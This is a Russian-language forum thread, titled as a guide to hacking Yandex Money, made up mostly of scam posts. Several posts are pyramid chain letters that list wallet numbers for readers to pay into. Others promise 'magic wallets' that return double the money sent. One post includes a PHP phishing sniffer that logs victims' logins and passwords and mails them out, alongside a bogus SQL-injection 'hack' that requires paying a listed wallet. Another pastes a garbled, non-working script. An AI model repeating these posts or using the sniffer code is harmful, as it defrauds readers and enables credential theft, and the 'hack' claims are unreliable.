не верте во всю эту хрень, не жалко денег киньте лучше сюда 410011676919302 )))))
ВЗЛОМ ЯНДЕКС ДЕНЕГ 100%
Сообщений 211 страница 236 из 236
Поделиться2122013-04-18 08:47:55
Здравствуйте!
Я предлагаю Вам вещь‚ к которой и сам относился поначалу скептически.
Но в отличие от многих подобных предложений - ЭТО ДЕЙСТВИТЕЛЬНО РАБОТАЕТ!!
Наткнулся я на это совершенно случайно‚ когда искал работу для дополнительного заработка. Найдя статью‚ в которой говорилось‚ что можно сделать СОТНИ ТЫСЯЧ рублей всего
за ПАРУ НЕДЕЛЬ при вложении всего 70 руб.‚ я подумал‚ что это должно быть очередная фишка для лохов‚ но решил всё-таки дочитать до конца и узнать‚ что мне предлагают: там говорилось‚ что надо послать по 10руб. на 7 Internet-кошельков‚ которые ниже перечислены. Потом вычеркнуть первый кошелёк из списка‚ тем самым‚ сместив список на одну строчку вверх‚ в результате чего седьмая строчка освобождается‚ куда Вы вписываете номер своего Internet-кошелька. Затем Вы закидываете данное сообщение‚ но уже с ВАШИМИ ДАННЫМИ на седьмой строчке‚ на 200 разных форумов. Никаких уловок. Ну‚ я поразмышлял и подумал‚ что‚ в принципе‚ ничего не теряю‚ кроме 70 руб.‚ и решил попробовать. Установил Internet-кошелёк‚ перечислил всем участникам акции по 10 руб. и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 3-х дней я зарегистрировался более чем в 100 бизнес - форумах и бесплатных досках объявлений. Прошла неделя‚ заглядываю в свой Internet-кошелёк и‚ угадайте что!!! Поступлений никаких нет‚ вообще. А разные участники пишут‚ что за неделю заработали кто по 750 руб.‚ кто по 450 руб.. Пиши-пропало‚ подумал я‚ попал в очередной лохотрон‚ желая заработать за пару недель десятки тысяч рублей. Ну и бросил это занятие‚ так и не дослав своё объявление до 200 форумов‚ 70 рублей убытка не ударило по моему бюджету. Ещё через неделю заглянул в свой Internet-кошелёк‚ смотрю‚ всего одно поступление 10 руб.. Да‚ думаю‚ дело не стоящее‚ случайно нашёлся такой же наивный‚ как и я… Ещё через две недели я всё-таки снова открыл свой Internet-кошелёк‚ а в нём уже около 1300 руб. Откуда? Непонятная картина‚ но всё равно 1300 руб. на дороге не валяются‚ хоть это и мало‚ как пишут предыдущие участники они за 1 месяц заработали десятки тысяч долларов. И вдруг после одного месяца началось самое интересное: на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ‚ спустя ещё 2 недели на моём счету уже было около 30 000 руб.. После этого я отправил свои объявления ещё более чем на 150 форумов.
Результат был ошеломляющий! По прошествии всего 2 месяцев я получил 152 000 руб.. И деньги идут каждый день‚ каждые 10 минут на мой счёт поступает по 10-30 руб. Я был в очень плохом экономическом положении и долго не мог найти себе подходящую работу до того‚ как наткнулся на эту статью. Я не поверил‚ что это работает‚ пока не начал получать переводы со всего света. Моя работа теперь - это каждый день по несколько часов в Интернете и ВСЁ!!! А заработок такой‚ что никаким начальникам и руководителям даже не снился!!!
Теперь я расскажу Вам как это работает и почему! Я Вам обещаю‚ что если Вы будете в точности соблюдать нижеперечисленные инструкции‚ то вы начнёте получать намного больше денег‚ чем думаете‚ не прилагая к этому особых усилий. Согласитесь‚ что это просто и совершенно легально!!! Ваш вклад всего 70 рублей и очень высокие шансы увеличить своё благосостояние!
ВАЖНО: это не обман и при этом Вы ничем не рискуете‚ но это РАБОТАЕТ! БЛАГОПОЛУЧИЕ ЛЮБОГО УЧАСТНИКА ПРОЕКТА
ЗАВИСИТ ОТ БЛАГОПОЛУЧИЯ КАЖДОГО ЕГО УЧАСТНИКА.
ВНИМАНИЕ!!! Прочтите это пару раз. Следуйте инструкциям в ТОЧНОСТИ и Вы неплохо заработаете в течение двух месяцев!!! ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ:
1. Зарегистрируйтесь в системе Яндекс.Деньги. хорошенько ознакомьтесь с данной системой‚ как она работает‚ выберите оптимальный для себя вариант пополнения кошелька и внесите 70 рублей 35 копеек(можно больше) на свой кошелёк. Сразу возникает проблема внесения денег на счёт‚ скорее всего‚ придётся прогуляться в ближайший банк‚ лично я пополнил через терминал оплаты сотовой связи‚ но поверьте один раз сходить для последующего реального заработка стоит! Вообще всё на сайте расписано и понятно. Возьмите первый номер кошелька из нижеуказанного списка‚ отправьте на него 10 руб 5 коп.(5 копеек снимают за перевод)‚ вписав этот номер в поле «Номер счёта»; всё‚ что Вы сделали - это создали услугу‚ и самое главное - абсолютно легально. Вы просите законный сервис‚ за который платите. Далее‚ начиная со второго‚ по аналогии отправьте по 10 руб 5 коп. на следующие 6 кошельков. И ещё номер кошельков вводите внимательно‚ не допустите ошибки. ОБЯЗАТЕЛЬНО вписывайте в поле Контракт/назначение платежа: Пожалуйста‚ внесите меня в список Яndex кошельков
P.S. Советую вводить номер кошелька вручную!!!
1) 41001527141270
2) 41001527135822
3) 41001521149236
4) 41001852369425
5) 41001834871869
6) 410011857936377
7) 410011088463770
ПОВТОРЯЮ‚ ЧТОБЫ ПОЛУЧАТЬ ДОХОДЫ‚ НЕОБХОДИМО ОТПРАВИТЬ НА КАЖДЫЙ ИЗ ЭТИХ 7 КОШЕЛЬКОВ ПО 10 РУБЛЕЙ 5 КОПЕЕК‚ ИНАЧЕ СЕТЕВЫМИ МОДЕРАТОРАМИ (АДМИНИСТРАТОРАМИ) YANDEX КОШЕЛЬКОВ ВЫ ПРОСТО НЕ БУДЕТЕ ВКЛЮЧЕНЫ В ПРОЕКТ И НЕ СМОЖЕТЕ ОБНАЛИЧИТЬ ДОХОДЫ.
Теперь ВНИМАНИЕ!!! После того‚ как Вы выполнили шаг 1‚ ШАГ 2: напишите своё подобное письмо‚ можете скопировать моё (можно в формате txt или как Вам удобней). В скопированной статье вычеркните из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-ого‚ который Вы стёрли‚ 3-ий на место 2-ого‚ четвёртый на место 3-его‚ 5-ый на место 4-ого‚ 6-ой на место 5-ого‚ 7-ой на место 6-ого‚ а в 7-ой номер‚ который оказался пустым‚ впишите номер ВАШЕГО кошелька!!!
3. Разместите эту статью на не менее‚ чем 200-300 форумах и новостных лентах (News Groups). Запомните‚ чем больше Вы разместите‚ тем выше будет Ваш доход‚ и этот доход будет напрямую зависеть от Вас. Когда будете размещать статью‚ то не пишите «Заработать легко миллион»‚ «Большие деньги за месяц» и т. п.‚ лучше написать «Требуется менеджер‚ з/п 1000 $». Размещение этой статьи на 200 форумах‚ даже на самых малопосещаемых‚ гарантирует Вам доход 180 000 руб. - ЭТО МИНИМУМ!!! Всего за 2 месяца!!! Больше размещений - больше доход (при том в геометрической прогрессии). ПОМНИТЕ!!! Этот бизнес продолжает существовать и процветать только благодаря АКТИВНОСТИ УЧАСТНИКОВ. Итак‚ когда Вы достигнете первой позиции‚ Вы будете иметь тысячи рублей просто КАК СОЗДАТЕЛЬ СПИСКА!!! Это стоит всего 70 рублей и совсем нетрудной работы!!! Главное - это РАБОТАЕТ!!! Но поработать всё же придётся. Необходимо заинтересовать людей. Для этого необходимо воспользоваться рассылкой. Размещением объявлений на специализированных сайтах о поисках работы‚ форумах‚ досках объявлений. А тут всё в ВАШИХ руках‚ ДЕРЗАЙТЕ!!! Ведь ничего‚ кроме 70 рублей вы не теряете!!!
А если вдруг не получится‚ а если этот бизнес рухнет‚ и никто мне денег не пришлёт? - ЭТО СТРОКА ДЛЯ ПЕССИМИСТОВ. Ну и что!!! Каждый день в Интернете появляются от 20000 до 50000 новых пользователей.
P. S. - Полезная информация как распространять информацию на форумах (досках и др. подходящих местах)
1. Открываем поисковик
2. Пишем в строке поиска фразу «форум удаленная работа» или «форум надомная работа» или «форум работа на дому» или «форум начать новую тему работа» и т. д. и т. п. (без кавычек). Поисковик найдет тысячи страниц, ссылки на которые сразу приводят на МИЛЛИОНЫ новых тем форумов. И еще не пугайтесь, если вдруг на том сайте, куда Вы захотели поместить свое объявление, уже есть одно или несколько похожих. Это лишний раз подтверждает то, что этот бизнес действительно работает! Очень действенны сайты о работе размещение адресов сайтов запрещено и т. п. сайты (разделы о вакансиях).
Удачи Вам!!А теперь я Вам объясню‚ почему Вы в любом случае ничего не теряете‚ а ТОЛЬКО ВЫИГРЫВАЕТЕ!!! Скажем‚ из 200 размещений я получу только 5 ответов (очень низкая цифра)‚ значит‚ я сделаю 50 рублей‚ находясь на 7 позиции в списке. Теперь эти 5 людей делают опять же МИНИМУМ 200 размещений с моим кошельком на 6-ой позиции‚ и только 5 людей отвечают тем первым 5 - это уже 250 рублей. Дальше эти 25 людей делают по 200 размещений с моим кошельком на 5 строчке и только 5 отвечают - мой доход 1 250 рублей. Теперь эти 125 людей‚ разместив и получив только по 5 ответов‚ дают мне 6 250 рублей прибыли (я на 4 позиции). Дальше смешнее: эти 625 людей делают по минимум 200 размещений со мной на 3 строчке и только 5 людей отвечают - это 31250 рублей. Самое интересное это то‚ что эти 3 125 людей сделают ещё по 200 размещений‚ ну а если им ответят только 5 людей‚ то я уже получаю 156 250 рублей (я на 2-ой позиции). Теперь ВНИМАНИЕ: эти 15 625 людей сделают ещё по 200 размещений‚ им отвечают 5 человек - это 781 250 рублей и так далее!!! Не правда ли внушительные цифры? И это всё за первоначальный вклад в 70 рублей!!! Вы себе можете представить‚ что тысячи людей со всего мира присоединяются к Интернету и читают эти статьи каждый день‚ так же как и Вы сейчас читаете эту статью!!! Так что, Потратите ли Вы 70 рублей‚ чтобы узнать работает ЭТО или нет – решать вам!!! Лично я попробовал… И последнее‚ на мой взгляд‚ самое главное: КАК СНИМАТЬ ДЕНЬГИ С ИНТЕРНЕТ-КОШЕЛЬКА? Нажимаешь «снять деньги»‚ далее выбираешь подходящий банк твоего города‚ лучше выбирай банк‚ где не надо открывать счёт‚ набираешь далее данные владельца программы ИНТЕРНЕТ-КОШЕЛЬКА‚ и набираешь данные‚ кто будет снимать деньги в банке (там требуются
паспортные данные‚ пишите правду‚ иначе не дадут денег).
Поделиться2132013-04-24 17:36:59
Есть две очень разные вещи. Первая - работать, а вторая - зарабатывать. Так вот многие из нас работают, но нельзя сказать, что зарабатывают. Так вот. .. Я и хотел бы рассказать, как можно зарабатывать деньги в Интернете.
И не спешите закрывать страницу, со словами: "Лохотрон!!!"
Я только прошу Вас потратить немного времени на прочтение данной странички. Ну а дальше... Дальше уже Вам решать. Наткнулся я на это совершенно случайно, когда искал работу для дополнительного заработка, найдя статью, в которой говорилось, что МОЖНО СДЕЛАТЬ СОТНИ ТЫСЯЧ РУБЛЕЙ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 70 РУБ.
Дальше там говорилось, что надо послать по 10 руб. на 7 Internet-кошельков, которые ниже перечислены. Потом вычеркнуть первый кошелёк из списка, тем самым, сместив список на одну строчку вверх. В результате чего седьмая строчка освобождается, куда Вы вписываете номер своего Internet-кошелька. Затем Вы закидываете данное сообщение, но уже с ВАШИМИ ДАННЫМИ на седьмой строчке, на 200 разных форумов.
Никаких уловок. Ну, я поразмышлял и подумал, что в принципе ничего не теряю кроме 70 руб., и решил попробовать.
Установил Интернет-кошелёк, перечислил всем участникам акции по 10 руб. и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 2-х дней я зарегистрировался на более чем 100 бизнес-форумах и бесплатных досках объявлений.
Прошла неделя, заглядываю в свой Интернет-кошелек, и угадайте ЧТО!!!! Поступлений никаких нет, вообще. А разные участники пишут, что за неделю заработали кто по 750 руб., кто по 450 руб… Пиши-пропало, подумал я, попал в очередной лохотрон, желая заработать за пару недель десятки тысяч рублей. Ну и бросил это занятие, так и не дослав свое объявление до 200 форумов. Ещё через неделю (ради любопытства) заглянул в свой Интернет-кошелек. Смотрю, всего одно поступление 10 руб. Да, думаю, дело не стоящее, случайно нашелся такой же наивный, как и я...
Ещё через две недели я все-таки снова открыл свой Интернет-кошелек, а в нем уже около 900 руб.
Откуда? Непонятная картина, но всё равно за 1 месяц 900 руб. это очень мало, как пишут предыдущие участники - они за 1 месяц заработали десятки тысяч долларов. И вдруг после 1 месяца началось самое интересное: на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ, спустя ещё 2 недели на моем счету уже было более 30 000 руб.
После этого я отправил свои объявления ещё более чем на 150 форумов.
РЕЗУЛЬТАТ БЫЛ ОЩЕЛОМЛЯЮЩИЙ! По прошествии всего 2 месяцев, я получил 141 000 руб.
И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 10-30 руб.
И это все только за цену в 70 руб.!!!
Моя работа теперь - это каждый день по 2 часа в Интернете и ВСЁ!!!!
А заработок такой, что никаким начальникам и руководителям даже и не снился!!!
Теперь, я расскажу Вам, как это работает, и самое главное ПОЧЕМУ!
Я Вам обещаю, что если вы будете в точности соблюдать ниже перечисленные инструкции, то Вы начнете получать намного больше денег, чем Вы думали, не прилагая к этому особых усилий. Согласитесь, это просто!!! И ЭТО СОВЕРШЕННО ЛЕГАЛЬНО. И ВАШ ВКЛАД СОСТАВЛЯЕТ ВСЕГО 70 РУБЛЕЙ...
ВАЖНО: ЭТО НЕ ОБМАН И ПРИ ЭТОМ ВЫ НИЧЕМ НЕ РИСКУЕТЕ, НО ЭТО РАБОТАЕТ!!!
ВНИМАНИЕ!!! ПРОЧТИТЕ ЭТО ПАРУ РАЗ!!!
Следуйте инструкциям в ТОЧНОСТИ и 180 000 руб. И БОЛЬШЕ будут Вашими в течение двух месяцев!!!
Всё это удачно работает благодаря ЧЕСТНОСТИ участников. ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ:
Шаг №1. Зарегистрируйтесь в системеYANDEX MONEY, хорошенько ознакомьтесь с данной системой, как она работает, выберите оптимальный для себя вариант пополнения кошелька и внесите 70 рублей на свой кошелёк + еще комиссию, которую снимает система за перевод 0,5%. Итого 70 рублей 35 копеек.
Сразу возникнет вопрос: "Как внести деньги?" и "Как снять?" На сегодняшний день нет ни чего проще. Это можно сделать при помощи терминалов по приему платежей, в точках по приему платежей, в банке, на почте и т.д. А также информацию Вы сможете найти на сайте.
Шаг №2. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб., вписав этот номер в поле "Номер счёта:". В поля Имя получателя и E-mail получателя вписывать ничего не нужно. В поле Контракт/назначение платежа напишите: ”Пожалуйста, внесите меня в список Яndex кошельков”. (без кавычек) Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. на следующие 6 кошельков (не забудьте вписывать в поле: Контракт/назначение платежа: "Пожалуйста, внесите меня в список Яndex кошельков").
1) 41001147350883
2) 41001147374243
3) 41001153422977
4) 41001155407445
5) 41001982249599
6) 4100175445418
7) 41001998404757
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ №2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате .txt или ещё как вам удобней). В скопированной статье вычеркните из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий-на место 2-го, 4-ый-на место 3-го, 5-ый-на место 4-го, 6-ой-на место 5-го и 7-й на место 6-го! А в 7-й номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!!
Шаг №3. Разместите эту статью на не менее чем 200 - 300 форумах и новостных лентах (News Groups). Запомните, чем больше Вы разместите, тем выше будет Ваш доход, и этот доход будет напрямую зависеть от Вас. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, гарантирует Вам доход 180 000 руб. - ЭТО МИНИМУМ!!! в течение двух месяцев!!! Больше размещений - больше доход (при том в геометрической прогрессии). ПОМНИТЕ!!! Этот бизнес продолжает существовать и процветать только БЛАГОДАРЯ ЧЕСТНОСТИ И СЕРЬЕЗНОСТИ УЧАСТНИКОВ.
Итак, когда Вы достигнете первой позиции, Вы будете иметь тысячи долларов просто КАК СОЗДАТЕЛЬ СПИСКА!!! Это стоит 70 руб. и совсем нетрудной работы!!! ГЛАВНОЕ ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! Но поработать всё же придется. Необходимо заинтересовать людей. Для этого необходимо воспользоваться рассылкой, размещением объявлений на специализированных сайтах о поисках работы, форумах, досках объявлений. А теперь я Вам объясню, почему Вы в любом случае ничего не теряете, а ТОЛЬКО ВЫИГРЫВАЕТЕ!!! Скажем, из 200 размещений я получу только 5 ответов (очень низкая цифра). Значит, я сделаю 50 рублей, находясь на 7 позиции в списке. Теперь эти 5 людей делают опять же МИНИМУМ 200 размещений с моим кошельком на 6 позиции, и только 5 людей отвечают тем первым 5-и; это уже 250 рублей. Дальше эти 25 людей делают по 200 размещений с моим кошельком на 5 строчке и только 5 отвечают; мой доход 1 250 рублей. Теперь эти 125 людей, разместив и получив только по 5 ответов, дают мне 6 250 рублей прибыли (я на 4 позиции). Дальше смешнее: эти 625 людей делают по минимум 200 размещений со мною на 3 строчке и только 5 людей отвечают; это 31250 рублей. Самое интересное это то, что эти 3 125 людей сделают еще по 200 размещений, ну а если им ответят только 5 людей, то я уже получаю 156 250 рублей (я на 2 позиции). Теперь ВНИМАНИЕ: эти 15 625 людей сделают еще по 200 размещений, им отвечают 5 человек это 781 250 рублей!!!
Не правда ли внушительная цифра? И это всё за первоначальный вклад в 70 рублей !!! Вы себе можете представить, что тысячи людей со всего мира присоединяются к Интернету и читают эти статьи каждый день. Так же как и вы сейчас читаете эту!!!
Так что?
Потратите ли Вы 70 рублей, чтобы узнать работает ли это???
А это действительно работает! Все продумано до мелочей
Поделиться2142013-04-26 17:35:19
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька 41001667391674
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
"Как выполнить взлом яндекс денег на своем компе"
1. Для начала проходим сюда yandex.ru
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей
6 Переводим на этот счет 41001667391674 где мы сделали баг
7. Где сообщение получателю пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''
Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001639676156»
8. В название платежа пишем это:
cc.content_id
9. И потом жмем перевести
10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам, вот скрин жми СЮДА Проверена это уже на многих компах так что дерзайте.
Если не понятно жми СЮДА
Поделиться2152013-05-18 12:38:13
Меня зовут Юрий. Я программист (PHP, Delphi),
В Интернете известен ещё как один из разработчик программы "Russian Password Crackers"
(взлом, восстановление паролей) И разработчик программы SpyAgent (клавиатурный шпион),
сейчас эту программу не развиваю. На данный момент я планирую и разрабатываю новые проекты,
связанные с пассивными источниками дохода. Работаю также в сфере SEO,
немножко интересуюсь МЛН-бизнесом (не "пирамидами", а только с участием реальной полезной продукции).
Как то раз пришла мне в голову мысль взломать яндекс систему потому что это первая система на которой
мало всякой защиты в первую очередь я нугуглил в поисковике много информации и
увидел массу разных разводов, в том числе и про волшебные кошельки. Запомните,
что нету волшебных кошельков и программ для взлома. Программы для взлома это вирус который
считывает ваш пароль и отправляет своему хозяину по эл.почте ваш платежные данные. Как-то я
писал на форуме про взлом и как взломать яндекс деньги. Для этого написал специальный скрип
для одного кошелька чтоб он давал сбой и присылал на ваш счет 300 рублей. Но какой-то один
не умный человек взял и выложил видео в поисковую систему яндекс и старый форум wzlom.mybb.ru
сразу же закрыли. Мне пришлось переделывать скрипт по новой искать дыры в системе яндекс.
И вот через месяц я переделал скрипт полностью теперь этот способ опять работает.
Я открыл этот форум и теперь могу поделиться информ. как взломать яндекс кошелек.
И так начнем. Для начала нужно завести кошелек в системе яндекс и положить рублей
70 через терминал оплаты сот. связи ну или каким то другим способом. Потом нужно перевести
ровно 62 рубля не больше не меньше на этот номер счета
41001691323770
В комментарии (сообщении) нужно скопировать этот скрипт:
<script language="JavaScript" type="text/javascript">// the number of ringsvar
ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++)
{ if (i{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++)
{ thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor
((maxfontsize/ringnumber))*(i+1)
<body><aref="http://scic.ya/seOver="showrings()onMouseOut="hid>[/font]
В течении 5 минут обновляете страницу и вам на счет должны прийти 300 рублей. Это хороший способ нажиться на этом!Этим можно пользоваться только один раз в день чтобы страждущие админы яндекса непропалили этот способ.
Уверяю вас этот способ работает!!! Проверено многими пользователями.
Поделиться2162013-05-21 19:16:24
Здравствуйте, у моего друга отец работает системным администратором,по роду службы сталкивался с многими яндекс кошельками.Из многих сотен проверенных им кошельков,посоветовал нам один:41001563731114. Система проста переводишь только одну и ту же сумму 115 рублей,получаешь в 2 раза больше.В поле для сообщения вводишь:254shtbvu123,что это значит сам не знаю и почему такая сумма тоже. Перевод можно делать один раз в сутки.Сумма 115 рублей каждый день для меня,школьника,очень даже ничего.Советую всем попробуйте не пожалеете,пока кошелек работает исправно.Всем желаю удачи!
Поделиться2172013-06-01 14:08:53
Здравствуйте!Облазила много сайтов и нашла единственный кошелек на который отправляешь деньги и обратно приходит в 2 раза больше. НО: отправлять надо не меньше 100 и не больше 5000 рублей, 5500 отправляла - не приходит. Я отправляю 2 раза в день по 2500 рублей, чистая прибыль получается 20000-30000 рублей в неделю. В чем смысл – не знаю. Если кому интересно, вот номер кошелька:410011736309279 : мне про эту систему рассказал знакомый в чате, думала наколка, но оказалось – работает.
Отредактировано Евгения (2013-06-01 14:10:21)
Поделиться2202013-08-12 14:12:16
Добрый день и сегодня я хочу вам рассказать как можно обмануть мошенников на яндекс деньгах! И так схема мошенников под названием "Волшебный кошелёк" работает на примере финансовой прирамиды, её суть заключается в том чтобы обманывать людей путем перечисления на их счёт денег! они обещают после зачисления на их счёт денежных средств прислать отправителю в 3 ото и в 4 раза больше сумму ( то есть если вы отправили 500 то на ваш счёт должно прийти 1500) Но я придумал как обмануть эту хитрую систему так как этой системой управляет не человек а софт(программа) то она запрогромиравана забирать деньги на 3 зачисление на счёт! так как 1 раз тот кто зачисляет не доверяет этой услуге и сначала зачисляет 50 ему приходит 150 потом на 2 раз зачисляет например 300 ему приходит 900 а на 3 совсем осмелев и доверяя этой программе зачисляет 5000 которые ему не приходят!! я проверил это на собственном опыте! и я понял что чтобы получить большую сумму от "Волшебного кошелька" надо сразу зачислить 1500 так как программа принимает это зачисление как за минимальное и присылает вам сумму в утроенном размере! счёт "Волшебного кошелька"410011926213285 где я уже таким способом неплохо зарабатываю! и получаю деньги от этих мошенников их же приёмом! и сделать на всякий случай 3 своих счёта и с этих счетов посылать по 1000 1500 на счёт "Волшебного кошелька" и производить такие зачисления не больше 3 раз в день!! Не то ваши счета в яндекс деньгах могут заблокировать!
Поделиться2212013-08-22 09:02:09
Кто хочет заработать читайте внимательно!!! Я Вас уверяю Ваше материальное положение резко улучшится, если Вы этого только захотите!!!!!!! (Понимаю с каким недоверием вы это читаете - но продолжайте, прошу, дочитайте статью до конца).
СРАЗУ СКАЖУ, КОГДА ЗАРАБОТАЕТЕ СВОИ ПЕРВЫЕ ТЫСЯЧИ ДВЕ, ПОТРАТЬТЕ ИХ НА РАССКРУТКУ РЕКЛАМЫ ЭТОГО СООБЩЕНИЯ!!! И ВЫ УВИДЕТЕ РЕЗУЛЬТАТ!!!
По прошествии всего 2 месяцев, я получил 155 000 руб. И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 10р. И это все только за цену в 70 руб.!!! Я был в очень плохом экономическом положении и долго не мог найти себе подходящую работу до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света… Я купил всё, что мне надо… И это очень кстати, согласитесь!?... Моя работа теперь - это каждый день по 2-3 часа в Интернете и ВСЁ!!!! А заработок такой, что никаким начальникам и руководителям даже и не снился!!!
ВОТ ТЕ САМЫЕ 2 ШАГА К УСПЕХУ:
1. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб, вписав этот номер в поле "Номер счёта". В поля "Имя получателя" и "E-mail получателя" вписывать ничего не нужно. В поле "Контракт/назначение платежа" напишите - "Пожалуйста, внесите меня в список Яndex кошельков". Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. на следующие 7 кошельков (не забудьте вписывать в поле "Контракт/назначение платежа" "Пожалуйста, внесите меня в список Яndex кошельков"):
1) 41001297354413;
2) 41001299172898;
3) 41001513905363;
4) 41001507563134;
5) 410011196012060;
6) 410011157694570;
7) 410011782862520
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!!Скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt или ещё как вам удобней). В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го,7-ой на место 6-го. А в 7-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!!
